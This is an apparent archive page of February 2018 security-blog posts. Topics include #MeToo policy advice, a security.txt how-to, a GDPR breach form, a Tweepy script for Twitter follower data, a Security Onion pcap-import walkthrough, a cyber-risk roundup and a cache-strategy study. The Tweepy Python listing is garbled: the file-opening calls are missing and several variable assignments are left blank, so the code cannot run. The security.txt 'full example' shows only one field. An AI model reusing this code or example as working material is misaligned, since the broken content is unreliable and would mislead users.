Monthly Archives: February 2018

#MeToo Prompts Employers to Review their Anti-Harassment Policies

Comprehensive anti-harassment policies are even more important in light of the #MeToo movement

The #MeToo movement, which was birthed in the wake of sexual abuse allegations against Hollywood mogul Harvey Weinstein, has shined a spotlight on the epidemic of sexual harassment and discrimination in the U.S. According to a nationwide survey by Stop Street Harassment, a staggering 81% of women and 43% of men have experienced some form of sexual harassment or assault in their lifetimes, with 38% of women and 13% of men reporting that they have been harassed at their workplaces.


Because of the astounding success of #MeToo – the “Silence Breakers” were named Time magazine’s Person of the Year in 2017 – businesses are bracing for a significant uptick in sexual harassment complaints in 2018. Insurers that offer employment practices liability coverage are expecting #MeToo to result in more claims as well. Forbes reports that they are raising some organizations’ premiums and deductibles (particularly in industries where it’s common for high-paid men to supervise low-paid women), refusing to cover some companies at all, and insisting that all insured companies have updated, comprehensive anti-harassment policies and procedures in place.

In addition to legal liability and difficulty obtaining affordable insurance, sexual harassment claims can irrevocably damage an organization’s reputation and make it difficult to attract the best talent. Not to mention, doing everything you can to prevent a hostile work environment is simply the right thing to do. Every company with employees should have an anti-harassment policy in place, and it should be regularly reviewed and updated as the organization and the legal landscape evolve.

Tips for a Good Anti-Harassment Policy

While the exact details will vary from workplace to workplace, in general, an anti-harassment policy should be written in straightforward, easy-to-understand language and include the following:

  • Real-life examples of inappropriate conduct, including in-person, over the phone, and through texts and email.
  • Clearly defined potential penalties for violating the policy.
  • A clearly defined formal complaint process with multiple channels for employees to make reports.
  • A no-retaliation clause assuring employees that they will not be disciplined for complaining about harassment.

In addition to having a formal anti-harassment policy, organizations must demonstrate their commitment to a harassment-free workplace by providing their employees with regular anti-harassment training, creating a “culture of compliance” from the top down, and following up with victimized employees after a complaint has been made to inform them on the status of the investigation and ensure that they have not been retaliated against.

Continuum GRC proudly supports the values of the #MeToo movement. We feel that sexual harassment and discrimination have no place in the workplace. In support of #MeToo, we are offering organizations, free of charge, a custom anti-harassment policy software module powered by our award-winning IT Audit Machine GRC software. Click here to create your FREE Policy Machine account and get started. Your free ITAM module will automate the process and walk you through the creation of your customized anti-harassment policy, step by step. Then, ITAM will act as a centralized repository of your anti-harassment compliance information moving forward, so that you can easily review and adjust your policies and procedures as needed.

The cyber security experts at Continuum GRC have deep knowledge of the cyber security field, are continually monitoring the latest information security threats, and are committed to protecting your organization from security breaches. Continuum GRC offers full-service and in-house risk assessment and risk management subscriptions, and we help companies all around the world sustain proactive cyber security programs.

Continuum GRC is proactive cyber security®. Call 1-888-896-6207 to discuss your organization’s cyber security needs and find out how we can help your organization protect its systems and ensure compliance.


Implement “security.txt” to advocate responsible vuln. disclosures


After discussing CAA records in DNS to whitelist your certificate authorities in my previous article, consider this: it's only a matter of time before someone finds an issue with your web presence, website or any front-facing application. If they do, what do you expect them to do? Keep it under wraps, or disclose it to you "responsibly"? This article is for you if you advocate responsible disclosure; otherwise, you have some catching up to do with reality (I shall come back to you later!). Now, while we are on responsible disclosure, "well-behaved" hackers and security researchers can reach you via bug-bounty channels, your info@example email (not recommended) or social media, or they may struggle to find a secure channel at all. But what if you had a way to broadcast your "security channel" details to ease their communication and provide them with a well-documented, managed conversation channel? Isn't that cool? Voila: what robots.txt is to search engines, security.txt is to security researchers!

I know you might be thinking, "...what if I have a page on my website which lists the security contacts?" But where would you host this page - under contact-us, security, information, about-us, etc.? This is the very issue that security.txt evangelists are trying to solve: standardizing the file, its path and its presence as part of RFC 5785 (well-known URIs). As per their website,

Security.txt defines a standard to help organizations define the process for security researchers to disclose security vulnerabilities securely.

The project is still in its early stages[1], but it is already receiving positive feedback from the security community, and big tech players like Google[2] have incorporated it as well. In my opinion, it very clearly signals that you take security seriously and are ready to have an open conversation with the security community if someone wants to report a finding, vulnerability or security issue with your website or application. By all means, it sends a positive message!

Semantics/format of "security.txt"

As security.txt follows a standard, here are some points to consider:

  • The file security.txt has to be placed in the .well-known directory under your domain's root.
  • It documents the following fields:
    • Comments: The file can include optional comments, which must begin with the # symbol.
    • Each field must be defined on its own line.
    • Contact: This field can be an email address, a phone number or a link to a page where a security researcher can contact you. This field is mandatory and MUST be present in the file. It should adhere to RFC 3986[3] syntax for emails, phone numbers and URIs (URIs MUST be served over HTTPS). For example,
      Contact: tel:+1-201-555-0123
    • Encryption: This directive should link to your encryption key if you expect the researcher to encrypt the communication. It MUST NOT be the key itself, but a URI pointing to the key file.
    • Signature: If you want to demonstrate the file's integrity, you can use this directive to link to a signature of the file. Each signature file must be named security.txt.sig and be accessible at the /.well-known/ path.
    • Policy: You can use this directive to link to your "security policy".
    • Acknowledgement: This directive can be used to acknowledge previous researchers and their findings. It should contain company and individual names.
    • Hiring: Want to hire security people? This is the place to post.
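Putting those directives together, a minimal security.txt might look like the file below. Every value here is a hypothetical placeholder - substitute your own contact details, key and policy URLs:

# Hypothetical /.well-known/security.txt
Contact: tel:+1-201-555-0123

Once such a file is in place, a researcher only needs to fetch /.well-known/security.txt on your domain to find your preferred reporting channel.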

A reference security.txt extracted from Google,


Hope this article gives you an idea of how to implement a security.txt file, and why it matters.

Stay safe!

  1. Early draft posted for RFC review: ↩︎

  2. Google security.txt file: ↩︎

  3. Uniform Resource Identifier: ↩︎

Luxembourg DPA Publishes Data Breach Reporting Form

On February 12, 2018, the Luxembourg data protection authority (Commission nationale pour la protection des données, “CNPD”) published on its website (in English and French) a form to be used for the purpose of compliance with data breach notification requirements applicable under the EU General Data Protection Regulation (the “GDPR”). The CNPD also published questions and answers (“Q&As”) regarding the requirements.

Pursuant to the GDPR, data controllers must notify the competent supervisory authority of a data breach within 72 hours of becoming aware of it, if the breach is likely to result in a risk to the rights and freedoms of individuals. Though breach notification is currently not required under the EU Data Protection Directive 95/46/EC, the CNPD has already published the form to assist companies with breach reporting prior to the GDPR coming into force.

For the time being, breach notifications can be sent to the CNPD directly; alternative submission methods are currently under discussion. Notifications will be processed by the CNPD informally until the GDPR becomes directly applicable. Upon receipt, the CNPD will send an acknowledgement of receipt to the data controller, review the form, verify its authenticity and ask the controller any relevant questions, if necessary.

The form provides a series of questions for affected organizations, which are designed to incorporate the requirements of Article 33 of the GDPR. Organizations are not strictly required to use the exact form prepared by the CNPD, but must ensure that any form they do use complies with Article 33 of the GDPR.

In its Q&As, the CNPD also explains that data controllers must document any privacy breach, even those that are not reported to the CNPD. Such documentation must include the facts surrounding the breach, its impact and measures taken to mitigate them. The CNPD may request access to such documentation.

How To Get Twitter Follower Data Using Python And Tweepy

In January 2018, I wrote a couple of blog posts outlining some analysis I’d performed on followers of popular Finnish Twitter profiles. A few people asked that I share the tools used to perform that research. Today, I’ll share a tool similar to the one I used to conduct that research, and at the same time, illustrate how to obtain data about a Twitter account’s followers.

This tool uses Tweepy to connect to the Twitter API. In order to enumerate a target account’s followers, I like to start by using Tweepy’s followers_ids() function to get a list of Twitter ids of accounts that are following the target account. This call completes in a single query, and gives us a list of Twitter ids that can be saved for later use (since both screen_name and name can be changed, but the account’s id never changes). Once I’ve obtained a list of Twitter ids, I can use Tweepy’s lookup_users(user_ids=batch) to obtain Twitter User objects for each Twitter id. As far as I know, this isn’t exactly the documented way of obtaining this data, but it suits my needs. /shrug
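Since lookup_users() accepts at most 100 ids per call, the batching step can be sketched (and sanity-checked) without touching the Twitter API at all. The chunks() helper below is my own illustrative stand-in for the generator expression used in the full script:

```python
# Split a list of ids into batches of at most 100, the limit that
# Twitter's users/lookup endpoint accepts per request.
def chunks(ids, batch_len=100):
    return [ids[i:i + batch_len] for i in range(0, len(ids), batch_len)]

follower_ids = list(range(250))  # stand-in for real Twitter ids
batches = chunks(follower_ids)
print(len(batches))      # 3
print(len(batches[0]))   # 100
print(len(batches[-1]))  # 50
```

Each batch can then be passed to lookup_users(user_ids=batch) as shown in the full script.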

Once a full set of Twitter User objects has been obtained, we can perform analysis on it. In the following tool, I chose to look at the account age and friends_count of each account returned, print a summary, and save a summarized form of each account’s details as json, for potential further processing. Here’s the full code:

from tweepy import OAuthHandler
from tweepy import API
from collections import Counter
from datetime import datetime
import sys
import json
import os
import io
import re
import time

# Helper functions to load and save intermediate steps
def save_json(variable, filename):
    with, "w", encoding="utf-8") as f:
        f.write(json.dumps(variable, indent=4, ensure_ascii=False))

def load_json(filename):
    ret = None
    if os.path.exists(filename):
        with, "r", encoding="utf-8") as f:
            ret = json.load(f)
    return ret

def try_load_or_process(filename, processor_fn, function_arg):
    # Only json files are used in this script; load_bin/save_bin are the
    # pickle-based equivalents, assumed to be defined elsewhere.
    if filename.endswith("json"):
        load_fn = load_json
        save_fn = save_json
    else:
        load_fn = load_bin
        save_fn = save_bin
    if os.path.exists(filename):
        print("Loading " + filename)
        return load_fn(filename)
    else:
        ret = processor_fn(function_arg)
        print("Saving " + filename)
        save_fn(ret, filename)
        return ret

# Some helper functions to convert between different time formats and perform date calculations
def twitter_time_to_object(time_string):
    twitter_format = "%a %b %d %H:%M:%S %Y"
    match_expression = r"^(.+)\s(\+[0-9][0-9][0-9][0-9])\s([0-9][0-9][0-9][0-9])$"
    match = re.match(match_expression, time_string)
    if match is not None:
        first_bit =
        second_bit =
        last_bit =
        new_string = first_bit + " " + last_bit
        date_object = datetime.strptime(new_string, twitter_format)
        return date_object

def time_object_to_unix(time_object):
    return int(time_object.strftime("%s"))

def twitter_time_to_unix(time_string):
    return time_object_to_unix(twitter_time_to_object(time_string))

def seconds_since_twitter_time(time_string):
    input_time_unix = int(twitter_time_to_unix(time_string))
    current_time_unix = int(get_utc_unix_time())
    return current_time_unix - input_time_unix

def get_utc_unix_time():
    dts = datetime.utcnow()
    return time.mktime(dts.timetuple())

# Get a list of follower ids for the target account
def get_follower_ids(target):
    return auth_api.followers_ids(target)

# Twitter API allows us to batch query 100 accounts at a time
# So we'll create batches of 100 follower ids and gather Twitter User objects for each batch
def get_user_objects(follower_ids):
    batch_len = 100
    num_batches = len(follower_ids) // batch_len
    batches = (follower_ids[i:i+batch_len] for i in range(0, len(follower_ids), batch_len))
    all_data = []
    for batch_count, batch in enumerate(batches):
        sys.stdout.write("Fetching batch: " + str(batch_count) + "/" + str(num_batches) + "\n")
        users_list = auth_api.lookup_users(user_ids=batch)
        users_json = [u._json for u in users_list]
        all_data += users_json
    return all_data

# Creates one week length ranges and finds items that fit into those range boundaries
def make_ranges(user_data, num_ranges=20):
    range_max = 604800 * num_ranges
    range_step = range_max // num_ranges

# We create ranges and labels first and then iterate these when going through the whole list
# of user data, to speed things up
    ranges = {}
    labels = {}
    for x in range(num_ranges):
        start_range = x * range_step
        end_range = x * range_step + range_step
        label = "%02d" % x + " - " + "%02d" % (x+1) + " weeks"
        labels[label] = []
        ranges[label] = {}
        ranges[label]["start"] = start_range
        ranges[label]["end"] = end_range
    for user in user_data:
        if "created_at" in user:
            account_age = seconds_since_twitter_time(user["created_at"])
            for label, timestamps in ranges.items():
                if account_age > timestamps["start"] and account_age < timestamps["end"]:
                    entry = {}
                    id_str = user["id_str"]
                    entry[id_str] = {}
                    fields = ["screen_name", "name", "created_at", "friends_count", "followers_count", "favourites_count", "statuses_count"]
                    for f in fields:
                        if f in user:
                            entry[id_str][f] = user[f]
                    labels[label].append(entry)
    return labels

if __name__ == "__main__":
    account_list = []
    if len(sys.argv) > 1:
        account_list = sys.argv[1:]

    if len(account_list) < 1:
        print("No parameters supplied. Exiting.")
        sys.exit(0)

    # Add your own Twitter API credentials here
    consumer_key = ""
    consumer_secret = ""
    access_token = ""
    access_token_secret = ""

    auth = OAuthHandler(consumer_key, consumer_secret)
    auth.set_access_token(access_token, access_token_secret)
    auth_api = API(auth)

    for target in account_list:
        print("Processing target: " + target)

# Get a list of Twitter ids for followers of target account and save it
        filename = target + "_follower_ids.json"
        follower_ids = try_load_or_process(filename, get_follower_ids, target)

# Fetch Twitter User objects from each Twitter id found and save the data
        filename = target + "_followers.json"
        user_objects = try_load_or_process(filename, get_user_objects, follower_ids)
        total_objects = len(user_objects)

# Record a few details about each account that falls between specified age ranges
        ranges = make_ranges(user_objects)
        filename = target + "_ranges.json"
        save_json(ranges, filename)

# Print a few summaries
        print("\t\tFollower age ranges")
        total = 0
        following_counter = Counter()
        for label, entries in sorted(ranges.items()):
            print("\t\t" + str(len(entries)) + " accounts were created within " + label)
            total += len(entries)
            for entry in entries:
                for id_str, values in entry.items():
                    if "friends_count" in values:
                        following_counter[values["friends_count"]] += 1
        print("\t\tTotal: " + str(total) + "/" + str(total_objects))
        print("\t\tMost common friends counts")
        total = 0
        for num, count in following_counter.most_common(20):
            total += count
            print("\t\t" + str(count) + " accounts are following " + str(num) + " accounts")
        print("\t\tTotal: " + str(total) + "/" + str(total_objects))

Let’s run this tool against a few accounts and see what results we get. First up: @realDonaldTrump


Age ranges of new accounts following @realDonaldTrump

As we can see, over 80% of @realDonaldTrump’s last 5000 followers are very new accounts (less than 20 weeks old), with a majority of those being under a week old. Here are the top friends_count values of those accounts:


Most common friends_count values seen amongst the new accounts following @realDonaldTrump

No obvious pattern is present in this data.

Next up, an account I looked at in a previous blog post – @niinisto (the president of Finland).

Age ranges of new accounts following @niinisto

Many of @niinisto’s last 5000 followers are new Twitter accounts, though not in as large a proportion as in the @realDonaldTrump case. In both of the above cases, this is to be expected, since both accounts are recommended to new users of Twitter. Let’s look at the friends_count values for the above set.

Most common friends_count values seen amongst the new accounts following @niinisto

In some cases, clicking through the creation of a new Twitter account (next, next, next, finish) will create an account that follows 21 Twitter profiles. This can explain the high proportion of accounts in this list with a friends_count value of 21. However, we might expect to see the same (or an even stronger) pattern with the @realDonaldTrump account, and we don’t. I’m not sure why this is the case, but it could be that Twitter has some automation in place to auto-delete programmatically created accounts. If you look at the output of my script, you’ll see that between fetching the list of Twitter ids for the last 5000 followers of @realDonaldTrump and fetching the full Twitter User objects for those ids, 3 accounts “went missing” (hence the tool only collected data for 4997 accounts).

Finally, just for good measure, I ran the tool against my own account (@r0zetta).

Age ranges of new accounts following @r0zetta

Here you see a distribution that’s probably common for non-celebrity Twitter accounts. Not many of my followers have new accounts. What’s more, there’s absolutely no pattern in the friends_count values of these accounts:

Most common friends_count values seen amongst the new accounts following @r0zetta

Of course, there are plenty of other interesting analyses that can be performed on the data collected by this tool. Once the script has been run, all data is saved on disk as json files, so you can process it to your heart’s content without having to run additional queries against Twitter’s servers. As usual, have fun extending this tool to your own needs, and if you’re interested in reading some of my other guides or analyses, here’s a full list of those articles.
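As a starting point for such offline processing, here is a hypothetical follow-up analysis of the saved ranges json file. The summarize_ranges() helper is my own illustration, not part of the tool above; it recomputes the per-range account counts and friends_count tally from the saved structure:

```python
from collections import Counter

# Summarize the ranges structure the script saves as <target>_ranges.json:
# count accounts per age-range label and tally friends_count values.
def summarize_ranges(ranges):
    per_range = {label: len(entries) for label, entries in ranges.items()}
    friends = Counter()
    for entries in ranges.values():
        for entry in entries:
            for values in entry.values():
                if "friends_count" in values:
                    friends[values["friends_count"]] += 1
    return per_range, friends

# Synthetic sample mimicking the saved file's shape
sample = {"00 - 01 weeks": [{"123": {"screen_name": "a", "friends_count": 21}},
                            {"456": {"screen_name": "b", "friends_count": 21}}],
          "01 - 02 weeks": [{"789": {"screen_name": "c", "friends_count": 50}}]}
per_range, friends = summarize_ranges(sample)
print(per_range)               # {'00 - 01 weeks': 2, '01 - 02 weeks': 1}
print(friends.most_common(1))  # [(21, 2)]
```

The same pattern extends to followers_count, statuses_count, or any other field recorded per account.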

Wizards of Entrepreneurship – Business Security Weekly #75

This week, Michael is joined by Matt Alderman to interview Will Lin, Principal and Founding Investor at Trident Capital Security! In the Security News, Apptio raised $4.6M in Equity, Morphisec raised $12M in Series B, & Dover Microsystems raised $6M "Seed" Round! Last but not least, part two of our second feature interview with Sean D'Souza, author of The Brain Audit! All that and more, on this episode of Business Security Weekly!

Full Show Notes:


Visit for all the latest episodes!

Pre-Crime: It’s Not Just Science Fiction Anymore

In Philip K. Dick’s 1956 “The Minority Report,” murder was eradicated due to the “Pre-Crime Division,” which anticipated and prevented crime before it happened. Sixty years later, elements of pre-crime cybersecurity technology are already in place. But how do we toe the line between safety and Big Brother? This panel will discuss the history of predictive analytics, privacy implications of monitoring and how AI/machine learning will shape society in the future. 


Joe Brown, Editor in Chief of Popular Science

Dr. Richard Ford, Chief Scientist at Forcepoint
Jennifer Lynch, Senior Staff Attorney, Civil Liberties at EFF
David Brin, Scientist, Futurist and Author

Dr. Richard Ford, Forcepoint Chief Scientist

Session location

Fairmont Hotel - Manchester EFG

Session Address

101 Red River, Austin, TX,78701


Wednesday, March 14, 2018 -
14:00 - 15:00

Importing Pcap into Security Onion

Within the last week, Doug Burks of Security Onion (SO) added a new script that revolutionizes the use case for his amazing open source network security monitoring platform.

I have always used SO in a live production mode, meaning I deploy a SO sensor sniffing a live network interface. As the multitude of SO components observe network traffic, they generate, store, and display various forms of NSM data for use by analysts.

The problem with this model is that it could not be used for processing stored network traffic. If one simply replayed the traffic from a .pcap file, the new traffic would be assigned contemporary timestamps by the various tools observing the traffic.

While all of the NSM tools in SO have the independent capability to read stored .pcap files, there was no unified way to integrate their output into the SO platform.

Therefore, for years, there has not been a way to import .pcap files into SO -- until last week!

Here is how I tested the new so-import-pcap script. First, I made sure I was running Security Onion Elastic Stack Release Candidate 2 or later. Next, I downloaded the script using wget.

I continued as follows:

richard@so1:~$ sudo cp so-import-pcap /usr/sbin/

richard@so1:~$ sudo chmod 755 /usr/sbin/so-import-pcap

I tried running the script against two of the sample files packaged with SO, but ran into issues with both.

richard@so1:~$ sudo so-import-pcap /opt/samples/10k.pcap


Please wait while...
...creating temp pcap for processing.
mergecap: Error reading /opt/samples/10k.pcap: The file appears to be damaged or corrupt
(pcap: File has 263718464-byte packet, bigger than maximum of 262144)
Error while merging!

I checked the file with capinfos.

richard@so1:~$ capinfos /opt/samples/10k.pcap
capinfos: An error occurred after reading 17046 packets from "/opt/samples/10k.pcap": The file appears to be damaged or corrupt.
(pcap: File has 263718464-byte packet, bigger than maximum of 262144)

Capinfos confirmed the problem. Let's try another!
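To make that error message concrete, here is a minimal sketch (my own illustration, not Wireshark's actual code) of the check that is failing: classic pcap stores a captured-length field in each record header, and tools reject records whose length exceeds the 262144-byte ceiling. A length as absurd as 263718464 almost always means the file is truncated or corrupt rather than containing a genuinely huge packet.

```python
import struct
import io

MAX_PACKET = 262144  # the per-packet ceiling mergecap complained about

def first_packet_len(pcap_bytes):
    """Read a classic pcap's first record header and return its captured length."""
    f = io.BytesIO(pcap_bytes)
    global_header = f.read(24)  # magic, version, tz, sigfigs, snaplen, linktype
    magic = struct.unpack("<I", global_header[:4])[0]
    endian = "<" if magic == 0xa1b2c3d4 else ">"
    ts_sec, ts_usec, incl_len, orig_len = struct.unpack(endian + "IIII", f.read(16))
    return incl_len

# Build a tiny in-memory pcap containing one 4-byte packet
global_hdr = struct.pack("<IHHiIII", 0xa1b2c3d4, 2, 4, 0, 0, 262144, 1)
record = struct.pack("<IIII", 0, 0, 4, 4) + b"\x00" * 4
length = first_packet_len(global_hdr + record)
print(length, length > MAX_PACKET)  # 4 False
```

On a corrupt file, this incl_len field is where the bogus 263718464 value would show up.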

richard@so1:~$ sudo so-import-pcap /opt/samples/zeus-sample-1.pcap


Please wait while...
...creating temp pcap for processing.
mergecap: Error reading /opt/samples/zeus-sample-1.pcap: The file appears to be damaged or corrupt
(pcap: File has 1984391168-byte packet, bigger than maximum of 262144)
Error while merging!

Another bad file. Trying a third!

richard@so1:~$ sudo so-import-pcap /opt/samples/evidence03.pcap


Please wait while...
...creating temp pcap for processing.
...setting sguild debug to 2 and restarting sguild.
...configuring syslog-ng to pick up sguild logs.
...disabling syslog output in barnyard.
...configuring logstash to parse sguild logs (this may take a few minutes, but should only need to be done once)...done.
...stopping curator.
...disabling curator.
...stopping ossec_agent.
...disabling ossec_agent.
...stopping Bro sniffing process.
...disabling Bro sniffing process.
...stopping IDS sniffing process.
...disabling IDS sniffing process.
...stopping netsniff-ng.
...disabling netsniff-ng.
...adjusting CapMe to allow pcaps up to 50 years old.
...analyzing traffic with Snort.
...analyzing traffic with Bro.
...writing /nsm/sensor_data/so1-eth1/dailylogs/2009-12-28/snort.log.1261958400

Import complete!

You can use this hyperlink to view data in the time range of your import:

or you can manually set your Time Range to be:
From: 2009-12-28    To: 2009-12-29

Incidentally here is the capinfos output for this trace.

richard@so1:~$ capinfos /opt/samples/evidence03.pcap
File name:           /opt/samples/evidence03.pcap
File type:           Wireshark/tcpdump/... - pcap
File encapsulation:  Ethernet
Packet size limit:   file hdr: 65535 bytes
Number of packets:   1778
File size:           1537 kB
Data size:           1508 kB
Capture duration:    171 seconds
Start time:          Mon Dec 28 04:08:01 2009
End time:            Mon Dec 28 04:10:52 2009
Data byte rate:      8814 bytes/s
Data bit rate:       70 kbps
Average packet size: 848.57 bytes
Average packet rate: 10 packets/sec
SHA1:                34e5369c8151cf11a48732fed82f690c79d2b253
RIPEMD160:           afb2a911b4b3e38bc2967a9129f0a11639ebe97f
MD5:                 f8a01fbe84ef960d7cbd793e0c52a6c9
Strict time order:   True

That worked! Now to see what I can find in the SO interface.

I accessed the Kibana application and changed the timeframe to include those in the trace.

Here's another screenshot. Again I had to adjust for the proper time range.

Very cool! However, I did not find any IDS alerts. This made me wonder if there was a problem with alert processing. I decided to run the script on a new .pcap:

richard@so1:~$ sudo so-import-pcap /opt/samples/emerging-all.pcap


Please wait while...
...creating temp pcap for processing.
...analyzing traffic with Snort.
...analyzing traffic with Bro.
...writing /nsm/sensor_data/so1-eth1/dailylogs/2010-01-27/snort.log.1264550400

Import complete!

You can use this hyperlink to view data in the time range of your import:

or you can manually set your Time Range to be:
From: 2010-01-27    To: 2010-01-28

When I searched the interface for NIDS alerts (after adjusting the time range), I found results:

The alerts show up in Sguil, too!

This is a wonderful development for the Security Onion community. Being able to import .pcap files and analyze them with the standard SO tools and processes, while preserving timestamps, makes SO a viable network forensics platform.

This thread in the mailing list is covering the new script.

I suggest running it on an evaluation system, probably in a virtual machine. I did all my testing on VirtualBox. Check it out!

Weekly Cyber Risk Roundup: W-2 Theft, BEC Scams, and SEC Guidance

The FBI is once again warning organizations that there has been an increase in phishing campaigns targeting employee W-2 information. In addition, this week saw new breach notifications related to W-2 theft, as well as reports of a threat actor targeting Fortune 500 companies with business email compromise (BEC) scams in order to steal millions of dollars.

The recent breach notification from Los Angeles Philharmonic highlights how W-2 information is often targeted during the tax season: attackers impersonated the organization’s chief financial officer via what appeared to be a legitimate email address and requested that the W-2 information for every employee be forwarded.

“The most popular method remains impersonating an executive, either through a compromised or spoofed email in order to obtain W-2 information from a Human Resource (HR) professional within the same organization,” the FBI noted in its alert on W-2 phishing scams.

In addition, researchers said that a threat actor, which is likely of Nigerian origin, has been successfully targeting accounts payable personnel at some Fortune 500 companies to initiate fraudulent wire transfers and steal millions of dollars. The examples observed by the researchers highlight “how attackers used stolen email credentials and sophisticated social engineering tactics without compromising the corporate network to defraud a company.”

The recent discoveries highlight the importance of protecting against BEC and other types of phishing scams. The FBI advises that the key to reducing the risk is understanding the criminals’ techniques and deploying effective mitigation processes, such as:

  • limiting the number of employees who have authority to approve wire transfers or share employee and customer data;
  • requiring another layer of approval such as a phone call, PIN, one-time code, or dual approval to verify identities before sensitive requests such as changing the payment information of vendors is confirmed;
  • and delaying transactions until additional verification processes can be performed.


Other trending cybercrime events from the week include:

  • Spyware companies hacked: A hacker has breached two different spyware companies, Mobistealth and Spy Master Pro, and provided gigabytes of stolen data to Motherboard. Motherboard reported that the data contained customer records, apparent business information, and alleged intercepted messages of some people targeted by the malware.
  • Data accidentally exposed: The University of Wisconsin – Superior Alumni Association is notifying alumni that their Social Security numbers may have been exposed due to the ID numbers for some individuals being the same as their Social Security numbers and those ID numbers being shared with a travel vendor. More than 70 residents of the city of Ballarat had their personal information posted online when an attachment containing a list of individuals who had made submissions to the review of City of Ballarat’s CBD Car Parking Action Plan was posted online unredacted. Chase said that a “glitch” led to some customers’ personal information being displayed on other customers’ accounts.
  • Notable data breaches: The compromise of a senior moderator’s account at the HardwareZone Forum led to a breach affecting 685,000 user profiles, the site’s owner said. White and Bright Family Dental is notifying patients that it discovered unauthorized access to a server that contained patient personal information. The University of Virginia Health System is notifying 1,882 patients that their medical records may have been accessed due to discovering malware on a physician’s device. HomeTown Bank in Texas is notifying customers that it discovered a skimming device installed on an ATM at its Galveston branch.
  • Other notable events: The Colorado Department of Transportation said that its Windows computers were infected with SamSam ransomware and that more than 2,000 computers were shut down to stop the ransomware from spreading and investigate the attack. The city of Allentown, Pennsylvania, said it is investigating the discovery of malware on its systems, but there is no reason to believe personal data has been compromised. Harper’s Magazine is warning its subscribers that their credentials may have been compromised.

SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of the top trending targets are shown in the chart below.


Cyber Risk Trends From the Past Week


Last week, the U.S. Securities and Exchange Commission (SEC) issued updated guidance on how public organizations should respond to data breaches and other cybersecurity issues.

The document, titled “Commission Statement and Guidance on Public Company Cybersecurity Disclosures,” states that “it is critical that public companies take all required actions to inform investors about material cybersecurity risks and incidents in a timely fashion, including those companies that are subject to material cybersecurity risks but may not yet have been the target of a cyber-attack.”

The SEC also advised that directors, officers, and other corporate insiders should not trade a public company’s securities if they are in possession of material nonpublic information — an issue that arose when it was reported that several Equifax executives sold shares in the days following the company’s massive data breach. The SEC said that public companies should have policies and procedures in place to prevent insiders from taking advantage of insider knowledge of cybersecurity incidents, as well as to ensure a timely disclosure of any related material nonpublic information.

“I believe that providing the Commission’s views on these matters will promote clearer and more robust disclosure by companies about cybersecurity risks and incidents, resulting in more complete information being available to investors,” said SEC Chairman Jay Clayton.  “In particular, I urge public companies to examine their controls and procedures, with not only their securities law disclosure obligations in mind, but also reputational considerations around sales of securities by executives.”

The SEC unanimously approved the updated guidance; however, Reuters reported that support from the Democrats on the commission was reluctant, as they had called for much more rigorous rulemaking to be put in place.

Ground Control to Major Thom

I recently finished a book called “Into the Black” by Roland White, charting the birth of the space shuttle from the beginnings of the space race through to its untimely retirement. It is a fascinating account of why “space is hard” and exemplifies the need for compromise and balance of risks in even the harshest … Read More

Improving Caching Strategies With SSICLOPS

F-Secure development teams participate in a variety of academic and industrial collaboration projects. Recently, we’ve been actively involved in a project codenamed SSICLOPS. This project has been running for three years, and has been a joint collaboration between ten industry partners and academic entities. Here’s the official description of the project.

The Scalable and Secure Infrastructures for Cloud Operations (SSICLOPS, pronounced “cyclops”) project focuses on techniques for the management of federated cloud infrastructures, in particular cloud networking techniques within software-defined data centres and across wide-area networks. SSICLOPS is funded by the European Commission under the Horizon2020 programme. The project brings together industrial and academic partners from Finland, Germany, Italy, the Netherlands, Poland, Romania, Switzerland, and the UK.

The primary goal of the SSICLOPS project is to empower enterprises to create and operate high-performance private cloud infrastructure that allows flexible scaling through federation with other clouds, without compromising on their service level and security requirements. SSICLOPS federation supports the efficient integration of clouds whether they are geographically collocated or spread out, and whether they belong to the same or different administrative entities or jurisdictions: in all cases, SSICLOPS delivers maximum performance for inter-cloud communication, enforces legal and security constraints, and minimizes overall resource consumption. In such a federation, individual enterprises are able to dynamically scale their cloud services in and out by offering their own spare resources (when available) and taking in resources from others when needed. This maximizes each member's infrastructure utilization while minimizing its excess capacity needs.

Many of our systems (both backend and on endpoints) rely on the ability to quickly query the reputation and metadata of objects from a centrally maintained repository. Reputation queries of this type are served either directly from the central repository, or through one of many geographically distributed proxy nodes. When a query is made to a proxy node, if the required verdicts don’t exist in that proxy’s cache, the proxy queries the central repository, and then delivers the result. Since reputation queries need to be low-latency, the additional hop from proxy to central repository slows down response times.

In the scope of the SSICLOPS project, we evaluated a number of potential improvements to this content distribution network. Our aim was to reduce the number of queries from proxy nodes to the central repository by improving caching mechanisms for use cases where the set of the most frequently accessed items is highly dynamic. We also looked into improving the speed of communications between nodes via protocol adjustments. Most of this work was done in cooperation with Deutsche Telekom and Aalto University.

The original implementation of our proxy nodes used a Least Recently Used (LRU) caching mechanism to determine which cached items should be discarded. Since our reputation verdicts have time-to-live values associated with them, these values were also taken into account in our original algorithm.
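A TTL-aware LRU cache of the kind described above can be sketched in a few lines of Python. This is a simplified illustration only (names and structure are ours, not F-Secure's production code): entries are evicted either because they are least recently used or because their time-to-live has expired.

```python
import time
from collections import OrderedDict

class TTLLRUCache:
    """LRU cache that also discards entries whose time-to-live has expired."""

    def __init__(self, capacity):
        self.capacity = capacity
        self._items = OrderedDict()  # key -> (value, expiry timestamp)

    def get(self, key):
        entry = self._items.get(key)
        if entry is None:
            return None                   # miss: caller queries the central repository
        value, expires_at = entry
        if time.monotonic() >= expires_at:
            del self._items[key]          # verdict expired: treat as a miss
            return None
        self._items.move_to_end(key)      # mark as most recently used
        return value

    def put(self, key, value, ttl):
        if key in self._items:
            del self._items[key]
        elif len(self._items) >= self.capacity:
            self._items.popitem(last=False)  # evict the least recently used entry
        self._items[key] = (value, time.monotonic() + ttl)
```

In a proxy node, a `get` miss would trigger a query to the central repository followed by a `put` with the TTL attached to the returned verdict.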

Hit Rate Results

Initial tests performed in October 2017 indicated that SG-LRU outperformed LRU on our dataset

During the project, we worked with Gerhard Hasslinger’s team at Deutsche Telekom to evaluate whether alternative caching strategies might improve the performance of our reputation lookup service. We found that Score-Gated LRU / Least Frequently Used (LFU) strategies outperformed our original LRU implementation. Based on the conclusions of this research, we decided to implement a windowed LFU caching strategy, with some limited “predictive” features for determining which items might be queried in the future. The results look promising, and we’re planning to bring the new mechanism into our production proxy nodes in the near future.


SG-LRU exploits the focus on top-k requests by keeping most top-k objects in the cache
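As a minimal illustration of the windowed-LFU idea described above (the actual SG-LRU and windowed-LFU algorithms evaluated in the project are more sophisticated; this toy version is our own), frequencies can be counted over a sliding window of recent requests so the cache adapts when the popular set shifts:

```python
from collections import Counter, deque

class WindowedLFUCache:
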